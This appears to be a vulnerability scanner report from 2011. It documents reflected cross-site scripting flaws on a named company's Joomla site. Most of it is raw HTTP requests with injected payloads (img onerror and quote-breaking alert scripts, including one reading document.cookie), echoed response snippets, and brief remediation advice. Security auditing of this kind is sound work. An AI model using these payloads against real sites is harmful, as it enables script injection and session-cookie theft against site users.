GET /modules/mod_sp_news_highlighter/assets/css/style.php?width=900&height=25f5c9a<img%20src%3da%20onerror%3dalert(1)>8f85a556a2c&uniqid=1&arrows=style1.png&linkcolor=047aac&linkhover=039ee1 HTTP/1.1 Host: www.karmasphere.com Proxy-Connection: keep-alive Referer: http://www.karmasphere.com/Downloadfd9f9'%3balert(document.cookie)//50f1acaf291/register-for-community-edition.html Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 9a99d17bd50953aeb8a9e7667440422a=4aeef22ecf132868e368d212ec83389e; stalyticsCookie=recurrent_count_%23%3A%23_1
The value of the linkcolor request parameter is copied into the HTML document as plain text between tags. The payload 4b6fe<img%20src%3da%20onerror%3dalert(1)>bb650400574 was submitted in the linkcolor parameter. This input was echoed as 4b6fe<img src=a onerror=alert(1)>bb650400574 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /modules/mod_sp_news_highlighter/assets/css/style.php?width=900&height=25&uniqid=1&arrows=style1.png&linkcolor=047aac4b6fe<img%20src%3da%20onerror%3dalert(1)>bb650400574&linkhover=039ee1 HTTP/1.1 Host: www.karmasphere.com Proxy-Connection: keep-alive Referer: http://www.karmasphere.com/Downloadfd9f9'%3balert(document.cookie)//50f1acaf291/register-for-community-edition.html Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 9a99d17bd50953aeb8a9e7667440422a=4aeef22ecf132868e368d212ec83389e; stalyticsCookie=recurrent_count_%23%3A%23_1
The value of the linkhover request parameter is copied into the HTML document as plain text between tags. The payload c46d1<img%20src%3da%20onerror%3dalert(1)>562579a2c10 was submitted in the linkhover parameter. This input was echoed as c46d1<img src=a onerror=alert(1)>562579a2c10 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /modules/mod_sp_news_highlighter/assets/css/style.php?width=900&height=25&uniqid=1&arrows=style1.png&linkcolor=047aac&linkhover=039ee1c46d1<img%20src%3da%20onerror%3dalert(1)>562579a2c10 HTTP/1.1 Host: www.karmasphere.com Proxy-Connection: keep-alive Referer: http://www.karmasphere.com/Downloadfd9f9'%3balert(document.cookie)//50f1acaf291/register-for-community-edition.html Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 9a99d17bd50953aeb8a9e7667440422a=4aeef22ecf132868e368d212ec83389e; stalyticsCookie=recurrent_count_%23%3A%23_1
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 68b0f<img%20src%3da%20onerror%3dalert(1)>df846d65303 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68b0f<img src=a onerror=alert(1)>df846d65303 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /modules/mod_sp_news_highlighter/assets/css/style.php?width=900&height=25&uniqid=1&arrows=style1.png&linkcolor=047aac&linkhover=03/68b0f<img%20src%3da%20onerror%3dalert(1)>df846d653039ee1 HTTP/1.1 Host: www.karmasphere.com Proxy-Connection: keep-alive Referer: http://www.karmasphere.com/Downloadfd9f9'%3balert(document.cookie)//50f1acaf291/register-for-community-edition.html Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 9a99d17bd50953aeb8a9e7667440422a=4aeef22ecf132868e368d212ec83389e; stalyticsCookie=recurrent_count_%23%3A%23_1
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ce15'%3balert(1)//37457d85594 was submitted in the REST URL parameter 5. This input was echoed as 3ce15';alert(1)//37457d85594 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /modules/mod_sp_news_highlighter/assets/js/3ce15'%3balert(1)//37457d85594 HTTP/1.1 Host: www.karmasphere.com Proxy-Connection: keep-alive Referer: http://www.karmasphere.com/Downloadfd9f9'%3balert(document.cookie)//50f1acaf291/register-for-community-edition.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 9a99d17bd50953aeb8a9e7667440422a=4aeef22ecf132868e368d212ec83389e; stalyticsCookie=recurrent_count_%23%3A%23_1
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 02:53:27 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" X-Content-Encoded-By: Joomla! 1.5 Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 02:53:27 GMT Content-Type: text/html; charset=utf-8 Content-Length: 34838
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://www.karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://www.karmasphere.com/modules/mod_sp_news_highlighter/assets/js/3ce15';alert(1)//37457d85594&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird return tru ...[SNIP]...
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45a90'%3balert(1)//1f6e5c52185 was submitted in the REST URL parameter 7. This input was echoed as 45a90';alert(1)//1f6e5c52185 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /plugins/system/cdscriptegrator/libraries/highslide/css/45a90'%3balert(1)//1f6e5c52185 HTTP/1.1 Host: www.karmasphere.com Proxy-Connection: keep-alive Referer: http://www.karmasphere.com/Downloadfd9f9'%3balert(document.cookie)//50f1acaf291/register-for-community-edition.html Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 9a99d17bd50953aeb8a9e7667440422a=4aeef22ecf132868e368d212ec83389e; stalyticsCookie=recurrent_count_%23%3A%23_1
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 02:51:41 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" X-Content-Encoded-By: Joomla! 1.5 Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 02:51:42 GMT Content-Type: text/html; charset=utf-8 Content-Length: 34864
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://www.karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://www.karmasphere.com/plugins/system/cdscriptegrator/libraries/highslide/css/45a90';alert(1)//1f6e5c52185&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird return tru ...[SNIP]...